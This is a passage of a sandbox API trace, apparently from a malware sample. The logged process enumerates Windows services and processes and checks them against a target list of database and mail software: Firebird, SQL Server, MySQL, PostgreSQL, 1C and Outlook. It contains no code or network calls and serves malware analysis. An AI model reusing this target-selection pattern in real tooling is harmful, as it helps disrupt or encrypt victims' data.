returned 1 [0264.803] lstrlenW (lpString="PcaSvc") returned 6 [0264.803] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0264.803] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0264.803] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0264.803] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0264.804] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0264.804] lstrlenW (lpString="PlugPlay") returned 8 [0264.804] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0264.804] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0264.804] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0264.804] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0264.804] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0264.804] lstrlenW (lpString="Power") returned 5 [0264.804] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0264.804] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0264.804] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0264.804] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0264.804] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0264.804] lstrlenW (lpString="ProfSvc") returned 7 [0264.804] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0264.804] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0264.804] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0264.804] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0264.804] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0264.804] lstrlenW (lpString="RpcEptMapper") returned 12 [0264.804] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0264.804] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0264.804] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0264.804] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0264.804] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0264.804] lstrlenW (lpString="RpcSs") returned 5 [0264.804] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0264.804] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0264.804] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0264.804] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0264.804] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0264.804] lstrlenW (lpString="SamSs") returned 5 [0264.805] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0264.805] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0264.805] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0264.805] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0264.805] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0264.805] lstrlenW (lpString="Schedule") returned 8 [0264.805] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0264.805] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0264.805] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0264.805] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0264.805] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0264.805] lstrlenW (lpString="SENS") returned 4 [0264.805] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0264.805] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0264.805] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0264.805] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0264.805] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0264.805] lstrlenW (lpString="ShellHWDetection") returned 16 [0264.805] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0264.805] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0264.805] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0264.805] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0264.805] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0264.805] lstrlenW (lpString="Spooler") returned 7 [0264.805] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0264.805] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0264.805] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0264.805] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0264.805] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0264.805] lstrlenW (lpString="SysMain") returned 7 [0264.805] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0264.805] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0264.806] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0264.806] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0264.806] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0264.806] lstrlenW (lpString="Themes") returned 6 [0264.806] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0264.806] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0264.806] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0264.806] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0264.806] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0264.806] lstrlenW (lpString="TrkWks") returned 6 [0264.806] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0264.806] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0264.806] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0264.806] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0264.806] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0264.806] lstrlenW (lpString="UxSms") returned 5 [0264.806] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0264.806] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0264.806] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0264.806] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0264.806] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0264.806] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0x3dec5a0 | out: hHeap=0xb00000) returned 1 [0264.806] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x380 [0264.807] Process32FirstW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0264.808] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0264.808] lstrlenW (lpString="System") returned 6 [0264.808] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0264.808] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0264.808] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0264.808] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0264.808] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0264.808] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0264.808] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0264.808] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0264.808] lstrlenW (lpString="smss.exe") returned 8 [0264.808] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0264.808] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0264.808] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0264.808] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0264.809] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0264.809] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0264.809] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0264.809] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0264.809] lstrlenW (lpString="csrss.exe") returned 9 [0264.809] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0264.809] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0264.809] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0264.809] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0264.809] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0264.809] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0264.809] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0264.809] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0264.809] lstrlenW (lpString="wininit.exe") returned 11 [0264.809] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0264.809] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0264.809] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0264.809] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0264.809] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0264.809] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0264.809] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0264.810] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x18c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0264.810] lstrlenW (lpString="csrss.exe") returned 9 [0264.810] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0264.810] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0264.810] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0264.810] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0264.810] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0264.810] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0264.810] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0264.810] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0264.810] lstrlenW (lpString="winlogon.exe") returned 12 [0264.810] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0264.810] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0264.810] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0264.811] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0264.811] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0264.811] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0264.811] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0264.811] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0264.811] lstrlenW (lpString="services.exe") returned 12 [0264.811] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0264.811] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0264.811] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0264.811] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0264.811] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0264.811] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0264.811] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0264.811] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x180, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0264.811] lstrlenW (lpString="lsass.exe") returned 9 [0264.811] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0264.811] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0264.811] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0264.811] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0264.811] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0264.812] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0264.812] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0264.812] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0264.812] lstrlenW (lpString="lsm.exe") returned 7 [0264.812] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0264.812] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0264.812] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0264.812] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0264.812] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0264.812] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0264.812] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0264.812] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0264.812] lstrlenW (lpString="svchost.exe") returned 11 [0264.812] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0264.812] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0264.812] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0264.812] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0264.812] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0264.812] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0264.812] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0264.812] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0264.813] lstrlenW (lpString="svchost.exe") returned 11 [0264.813] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0264.813] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0264.813] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0264.813] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0264.813] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0264.813] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0264.813] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0264.813] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0264.813] lstrlenW (lpString="svchost.exe") returned 11 [0264.813] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0264.813] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0264.813] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0264.813] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0264.813] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0264.813] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0264.813] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0264.813] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x340, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0264.814] lstrlenW (lpString="svchost.exe") returned 11 [0264.814] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0264.814] lstrlenW (lpString="svchost.exe") returned 11 [0264.814] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0264.814] lstrlenW (lpString="audiodg.exe") returned 11 [0264.814] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0264.815] lstrlenW (lpString="svchost.exe") returned 11 [0264.815] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0264.815] lstrlenW (lpString="svchost.exe") returned 11 [0264.815] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0264.815] lstrlenW (lpString="userinit.exe") returned 12 [0264.815] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x340, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0264.815] lstrlenW (lpString="dwm.exe") returned 7 [0264.815] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x448, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0264.816] lstrlenW (lpString="explorer.exe") returned 12 [0264.816] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0264.816] lstrlenW (lpString="spoolsv.exe") returned 11 [0264.816] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0264.816] lstrlenW (lpString="taskhost.exe") returned 12 [0264.816] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0264.817] lstrlenW (lpString="svchost.exe") returned 11 [0264.817] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="MicosoftSearch.exe")) returned 1 [0264.817] lstrlenW (lpString="MicosoftSearch.exe") returned 18 [0264.817] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x54c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0264.817] lstrlenW (lpString="reader_sl.exe") returned 13 [0264.817] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x54c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 0 [0264.817] CloseHandle (hObject=0x380) returned 1 [0264.817] Sleep (dwMilliseconds=0x1f4) [0265.349] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x47ea4e8 [0265.408] EnumServicesStatusExW (in: hSCManager=0x47ea4e8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 0 [0265.408] GetLastError () returned 0xea [0265.408] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xd68) returned 0x3dec5a0 [0265.408] EnumServicesStatusExW (in: hSCManager=0x47ea4e8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3dec5a0, cbBufSize=0xd68, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3dec5a0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 1 [0265.408] CloseServiceHandle (hSCObject=0x47ea4e8) returned 1 [0265.409] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0265.409] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0265.409] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0265.409] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0265.409] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0265.409] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0265.409] lstrlenW (lpString="AudioSrv") returned 8 [0265.409] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0265.409] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0265.409] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0265.409] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0265.409] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0265.409] lstrlenW (lpString="BFE") returned 3 [0265.409] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0265.409] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0265.409] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0265.409] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0265.409] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0265.409] lstrlenW (lpString="CryptSvc") returned 8 [0265.409] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0265.409] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", 